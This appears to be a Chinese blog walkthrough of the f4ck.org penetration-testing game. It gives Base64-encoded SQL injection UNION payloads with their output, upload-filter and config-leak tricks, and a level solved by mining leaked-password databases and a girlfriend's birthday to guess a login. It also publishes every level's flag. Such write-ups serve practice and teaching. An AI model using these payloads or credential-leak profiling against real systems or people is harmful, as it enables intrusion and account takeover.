应群里朋友要求做的法客渗透游戏过关攻略视频，其实每一步大家认真研究一下都是能过的。

视频做完才发现法客论坛的客我写错了，不好意思，大家不要介意哦。。法客论坛我没有邀请码，不常去，唉。

第1关

1、http://game.f4ck.org/level1/index.php?id=MQ==

很明显存在SQL注入，我想这关肯定是通过注入得到密码，但是我们再看看……很显然，为了加大一点难道，肯定是过滤了某此字符。而且注入点是id的参数值是通过Base64加密的，我们可以通过sqlmap的base64encode来配合使用，但是因为有过滤，所以不是很方便，经过我的测试，发现使用cookie提交的时候没有过滤。

为了节省时间我这里就不详细的说了，下面已经整理好了。

-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where TABLE_SCHEMA=database()

LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMsNCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCk=

news,pass

-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="pass"

LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzLDQgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdwYXNzJw==

id,thekey

-1 union select 1,thekey,3,4 from pass

LTEgdW5pb24gc2VsZWN0IDEsdGhla2V5LDMsNCBmcm9tIHBhc3M=

the key is => 1c3094d8afa720f79807e578ef7e4530

第2关

2、http://game.f4ck.org/level2/install.php

第二关当时我测试的时候，也是整了半天不明白，到底是哪里可以获取到key，后来仔细的看了一下他提示的文字，新站一般都有些配置方面的问题，于是

congraforyourskill

第3关

3、http://game.f4ck.org/level3/index.php

文件上传，很明显的js验证。

f4ckyoumyphoto

第4关

4、http://game.f4ck.org/level4/index.php

通过查看源代码我们发现了注释的地方有解密函数，通过看变量申明方式，感觉应该是php的，打开神器。http://www.waitalone.cn/phpstorm6.html

vicleo

第5关

5、http://game.f4ck.org/level5/index.php

很明显的，通关的url是那个看起来像一个小马的php文件

下载图片201302130416.png 看源文件

http://game.f4ck.org/level5/Uploadfile/201302135438.php

2013f4ckneedyou

第6关

6、http://game.f4ck.org/level6/login.php

这一关最难过了，虽然一看就知道是要社工，但是不是想象中的那么简单。别问我密码怎么查到的，自己去收集社工库，这个是娃哈哈群里的兄弟帮查的

明明密码查到了呀，为什么不正确呢？因为你忘了别人的女朋友，得到女友生日以后用社工字典生成一系列的密码来后台测试吧，最后成功得到密码

用户名：herolee

密码：herolee03170112

思路：csdn->herolee0317-不对-社工他->法客渗透游戏 herolee->

我是 法客渗透游戏中的 herolee，很爱女朋友。01-12 是我女友的生日，没人给建议。我就自己送了一件礼物。

组合字典herolee03170112